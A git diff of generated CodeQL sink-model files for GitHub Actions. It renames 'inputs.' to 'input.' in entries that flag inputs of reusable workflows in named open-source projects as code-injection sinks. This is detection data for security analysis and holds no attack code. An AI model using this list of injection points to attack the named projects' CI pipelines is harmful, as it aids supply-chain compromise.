diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index d62c86e1129e..c74922e61dc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 8aedf9000a06..169094c3eb38 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index b14f14538b81..6e4e4f4f1e90 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index 3129cac8979c..dbc26ef9f04f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - 
["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index a23f69909c7e..c69de7cfcc26 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index cd91f58c7ec7..685b0b144c9d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index d8be4cc11b91..9e3fc5cdc4f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - 
["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index ad0943c30408..4cd6cd8f591a 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] - - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e8c98ab4576a..01726410e185 100644 
--- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 00b45b50f887..90e61bcf11a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index a5f35f3b7379..b4e1ff8155a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index d05595196275..3621105b74e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", 
"code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index ec7b51abd8e3..b6660df1c9b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 92fd43bda752..ead0bcfab169 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index ca550e4ddd76..6f9a12e90698 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 580ac8bef0b5..8ac32e4a7b7f 100644 
--- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 463536e9693d..3c21fcad386c 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 57bf30dc0cc1..e0d2508932fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index b7e49d46e1c0..96830183506a 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 89257a02fcd2..7f9299eb4d39 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index a645511766be..7a79d4c1e092 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 1a7784c9f018..55888f485510 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
index ffb7a7d7d107..ea453ec48112 100644
--- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - 
["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 4ae93a83cd8f..39005b693e71 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml 
@@ -3,21 +3,21 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] - - 